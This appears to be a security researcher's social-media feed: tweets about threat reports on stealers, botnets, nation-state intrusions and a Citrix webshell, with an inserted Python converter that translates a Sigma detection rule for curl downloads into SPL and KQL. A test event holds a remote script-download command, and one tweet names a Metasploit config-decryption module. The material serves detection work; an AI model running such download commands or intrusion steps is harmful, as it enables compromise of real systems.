threat research • threat intelligence • cloud security • supply-chain security & random | Director of security research @Loginsoft_Inc
Opinions are my own
Here I created a quick map of resources if you're interested in hunting/tracking
malware & actors. You learn different techniques employed by researchers in our community.
https://t.co/PPKpgYu22m
If you don't want to signup for Mural, try this link
https://t.co/ZzpQsRW5tb
@Kostastsale @JayInfoSec @SOC_Prime But for the conversion of one SIEM query to another without using Sigma, I think it needs a great effort in terms of research and dev.
I spent a good number of hours just translating Azure KQL to Splunk SPL, but still I am not confident that it is well-optimized w.r.t. performance.
@Kostastsale @JayInfoSec @SOC_Prime If you're looking for a conversion of Sigma to SIEM queries, then we can use either sigmac or pySigma from the authors of Sigma itself. If we fancy a UI, then SOC Prime has released open-source tooling:
https://t.co/g4P6a6U9s2
Researchers uncover Statc Stealer, a dangerous #malware targeting Windows devices. It steals login data, cookies, #cryptocurrency wallets, and sensitive information.
Find out more in this: https://t.co/WyQgInHndu
#cybersecurity #hacking #datasecurity
New findings: QakBot #malware operators set up 15 new command-and-control servers, raising questions about their activities during the 'break' period.
Read more: https://t.co/gYYc9zIW4k
#cybersecurity #technology
🚨 A Russian nation-state actor, Turla, strikes again with the powerful DeliveryCheck backdoor. Learn how it breaches #Microsoft Exchange servers and exfiltrates sensitive messages from Signal app.
Read more 👉 https://t.co/Z4uMfTZOrS
#cybersecurity
Microsoft has identified highly targeted social engineering attacks by the threat actor Midnight Blizzard (previously NOBELIUM) using credential theft phishing lures sent as Microsoft Teams chats. Get detailed analysis, IOCs, and recommendations: https://t.co/1Ywtrlnme6
In May, we observed a threat actor (TA) exploit PaperCut NG (CVE-2023-27350) to download/execute a Havoc C2 binary.
➡️The TA then reviewed tasklist before dumping credentials using Mimikatz.
➡️Next, the TA downloaded numerous RMM tools.
https://t.co/k8UVEOdKTQ #AllIntel
1/X
Under investigation: During a hunt for DLL sideloading abuse of vmnat.exe, Sophos X-Ops uncovered a campaign targeting an organization in Southeast Asia. Aligning with TTPs previously attributed to the Mustang Panda threat group, we unraveled a complex, sustained intrusion. 1/10
North Korean state actors linked to the RGB have been identified in the JumpCloud hack! An #OPSEC mistake exposed their IP address.
Find details here: https://t.co/3CMAw7tQZx
The new report also uncovers the use of malicious Ruby scripts and payloads like FULLHOUSE.DOORED, STRATOFEAR, and TIEDYE.
#cyberattacks #cybersecuritytips #technology
Linux-based vulnerability (CVE) exploit detection through runtime security using Falco/Rego and #osquery, plus log-based detection using #sigma
https://t.co/M5SCioVQ2G
#infosec #threathunting #Linux #Exploit
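The two tweets above talk about log-based detection written as Sigma rules and about converting such rules into SIEM-native queries. As an added example, not part of either tweet and not the sigmac or pySigma tooling the thread mentions, here is a small Python converter that takes a constructed Sigma-style Linux process-creation rule, emits the equivalent Splunk SPL and Microsoft Sentinel KQL, and evaluates the same rule against a few constructed events. The rule itself, the field mappings (`SPL_FIELDS`, `KQL_FIELDS`) and the `ProcessEvents` table name are assumptions; the converter supports only a subset of Sigma (`field|modifier` keys, list values, and conditions built from `and`/`or`/`not` without parentheses).

```python
"""Minimal Sigma-style rule -> SPL / KQL converter with an in-Python evaluator.

Added example, not the sigmac or pySigma projects. The rule is given as an
already-parsed dict to avoid a PyYAML dependency; field names follow a
Sysmon-for-Linux style and are an assumption.
"""

# Constructed rule: curl fetching remote content, unless spawned by apt-get.
RULE = {
    "title": "Curl fetching remote content (constructed example)",
    "logsource": {"product": "linux", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "/curl",
            "CommandLine|contains": ["http://", "https://"],
        },
        "filter": {"ParentImage|endswith": "/apt-get"},
        "condition": "selection and not filter",
    },
}

# Hypothetical mappings from Sigma field names to each SIEM's schema.
SPL_FIELDS = {"Image": "process_path", "CommandLine": "process",
              "ParentImage": "parent_process_path"}
KQL_FIELDS = {"Image": "ProcessPath", "CommandLine": "ProcessCommandLine",
              "ParentImage": "ParentProcessPath"}


def split_field(key):
    """'Image|endswith' -> ('Image', 'endswith'); bare 'Image' -> equals."""
    name, _, modifier = key.partition("|")
    return name, modifier or "equals"


def escape(value):
    return value.replace("\\", "\\\\").replace('"', '\\"')


def spl_atom(field, modifier, value):
    # Splunk expresses contains/startswith/endswith with '*' wildcards.
    v = escape(value)
    pattern = {"equals": v, "contains": f"*{v}*",
               "startswith": f"{v}*", "endswith": f"*{v}"}[modifier]
    return f'{SPL_FIELDS.get(field, field)}="{pattern}"'


def kql_atom(field, modifier, value):
    # '=~' is KQL's case-insensitive equality, matching Sigma's default.
    op = {"equals": "=~", "contains": "contains",
          "startswith": "startswith", "endswith": "endswith"}[modifier]
    return f'{KQL_FIELDS.get(field, field)} {op} "{escape(value)}"'


def render_selection(selection, atom, and_kw, or_kw):
    """Fields in one selection are ANDed; a list of values is ORed."""
    clauses = []
    for key, values in selection.items():
        field, modifier = split_field(key)
        values = values if isinstance(values, list) else [values]
        alts = [atom(field, modifier, str(v)) for v in values]
        clauses.append(alts[0] if len(alts) == 1
                       else "(" + f" {or_kw} ".join(alts) + ")")
    return f" {and_kw} ".join(clauses)


def render_condition(detection, render_sel, and_kw, or_kw, not_kw):
    """Supports 'a', 'not a', 'a and b', 'a or b' (precedence: not > and > or)."""
    def term(tok):
        tok = tok.strip()
        if tok.startswith("not "):
            return f"{not_kw} {term(tok[4:])}"
        if tok == "condition" or tok not in detection:
            raise ValueError(f"unknown search identifier: {tok}")
        return "(" + render_sel(detection[tok]) + ")"
    conj = lambda part: f" {and_kw} ".join(term(t) for t in part.split(" and "))
    return f" {or_kw} ".join(conj(p) for p in detection["condition"].split(" or "))


def to_spl(rule):
    det = rule["detection"]
    return render_condition(det, lambda s: render_selection(s, spl_atom, "AND", "OR"),
                            "AND", "OR", "NOT")


def to_kql(rule):
    det = rule["detection"]
    return "ProcessEvents | where " + render_condition(
        det, lambda s: render_selection(s, kql_atom, "and", "or"), "and", "or", "not")


def selection_matches(selection, event):
    """Evaluate one selection against an event; Sigma strings are case-insensitive."""
    for key, values in selection.items():
        field, modifier = split_field(key)
        actual = str(event.get(field, "")).lower()
        values = values if isinstance(values, list) else [values]
        ok = any({"equals": actual == v, "contains": v in actual,
                  "startswith": actual.startswith(v),
                  "endswith": actual.endswith(v)}[modifier]
                 for v in (str(x).lower() for x in values))
        if not ok:
            return False
    return True


def rule_matches(rule, event):
    det = rule["detection"]
    def term(tok):
        tok = tok.strip()
        return (not term(tok[4:])) if tok.startswith("not ") else selection_matches(det[tok], event)
    return any(all(term(t) for t in part.split(" and "))
               for part in det["condition"].split(" or "))


# Constructed process-creation events; only the first should fire.
EVENTS = [
    {"Image": "/usr/bin/curl", "CommandLine": "curl https://example.invalid/x.sh -o /tmp/x.sh",
     "ParentImage": "/bin/bash"},
    {"Image": "/usr/bin/curl", "CommandLine": "curl http://mirror.invalid/pkg.deb",
     "ParentImage": "/usr/bin/apt-get"},
    {"Image": "/usr/bin/wget", "CommandLine": "wget https://example.invalid/",
     "ParentImage": "/bin/bash"},
]


def hits(rule=RULE, events=EVENTS):
    return [e["CommandLine"] for e in events if rule_matches(rule, e)]


if __name__ == "__main__":
    print("SPL:", to_spl(RULE))
    print("KQL:", to_kql(RULE))
    print("Matched:", hits())
```

The point a practitioner should take from this is the one the thread makes: the hard part of query translation is not the syntax but the semantics that differ per backend (case sensitivity, wildcard handling, field schemas), which is why the converter pins those choices explicitly per backend rather than string-replacing keywords.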
AVrecon, a stealthy SOHO router botnet, has silently grown for over 2 years! Over 70,000 routers infected, spanning 20 countries.
Find details here: https://t.co/IvlJSXLTcA
#cybersecurity #informationsecurity #hacking
A Citrix Gateway VPN compromised via CVE-2023-3519 (a critical unauthenticated RCE) shows evidence of exploitation on 7 July, 11 days before the official patch.
The attackers exfiltrated the system configuration file, probably to then use the Metasploit module called "citrix_netscaler_config_decrypt" and gain access as the user "nsroot" (full system access); other important secrets about the network and internal users are also leaked.
Webshell/backdoor logout.php has 0 detections in VirusTotal, I shared it here: https://t.co/IyrrM0yNfn
🚨 If you performed the update process to mitigate this vulnerability, assume that you might be compromised and perform a full assessment of the instances and users involved.
Follow these recommendations:
- https://t.co/js49XLDHX4
New blog post based on a recent intrusion I observed with #Ursnif as the initial infection!
Topics include:
✅ Detection opportunities
✅ TA's clipboard data
✅ Post-exploitation
and more!
The artifacts for this case: https://t.co/jTDVVL3pLp
The blog: https://t.co/cgKYZGaNFq
Cybercriminals are leveraging exploits for CVE-2021-40444 and CVE-2022-30190 to execute code through malicious Word files. Once opened, LokiBot #malware is downloaded, logging keystrokes, capturing screenshots, and stealing data.
Read: https://t.co/Sj7WBZHGBO
#cyberattack
Microsoft Incident Response's investigation of a BlackByte 2.0 ransomware attack that progressed in less than five days highlights the importance of disrupting common attack patterns, stopping attacker activities that precede ransomware deployment: https://t.co/oEpIpJuu1j